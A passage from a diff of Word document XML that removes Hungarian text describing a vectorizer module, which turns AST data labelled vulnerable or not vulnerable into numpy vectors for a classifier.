-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenated_title</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.csv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-ben</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az összefűzés</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az összes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>.</w:t>
@@ -16122,70 +15321,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>csv viszonylatában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> csak a saját</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>jában.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vectorizer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.py</w:t>
+        <w:t>txt kiterjesztéssel.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16193,1028 +15329,19 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>már a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>összefűzött</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és felcí</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kézett </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenated</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>_titled</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.csv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t dolgozza fel.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A fájl legfőbb feladata</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, hogy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> olyan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>numpy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>okat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hoz</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>zon</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> létre, ami</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ket</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> később az osztályozásért felelős fájl használni tud.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Kifejtve a főbb metódusait:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>__init__</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Vectorizer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> osztály konstruktora</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ami </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">paraméterként </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kér egy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>fájl nevet</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>filename</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">annak a felső határát, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">egy sorban </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hány szó fordul elő </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>max_vocab</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a felső határát, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hány szó van </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ténylegesen</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>max_length</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A paraméterek változókba helyezésén kívül még inicializál</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>va van egy számláló (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>), két szótár (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word2index, indextoword</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, egy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>táblázat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>dataset</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) és a kimeneti vektoroknak egy-egy változó (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>X, y</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">collectVocab: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">etódus, ami </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> teszi a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dataset </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0.oszlopá</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nak szavait </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>előfordulási szám</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>uk</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>at, utóbbi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szerint csökkenő sorrendben.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">createLookupTables: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>etódus</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, ami </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word2index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">változóba teszi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word_freqs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szavait</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sorrendnek megfelelően </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2-től </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>indexelve</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-egy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>indexet</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> társít hozzájuk</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> nulladik és első index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a *** és ismeretlen szavakhoz van fenntartva</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">word2index </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>value-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">index, az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>index2word-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>be pedig index</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-value</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>formában kerülnek be a szavak</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az indexükkel.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1134" w:hanging="283"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">createVectors: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Metódus, ami ciklussal végigmegy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">egyrészt </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dataset </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0.oszlopának</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szavain, és a hozzájuk tartozó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word2indenx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-beli</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> indexet </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">X </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> gyűjti</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, aminek a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hosszát később módosítja a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">max_length </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Másrészt a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
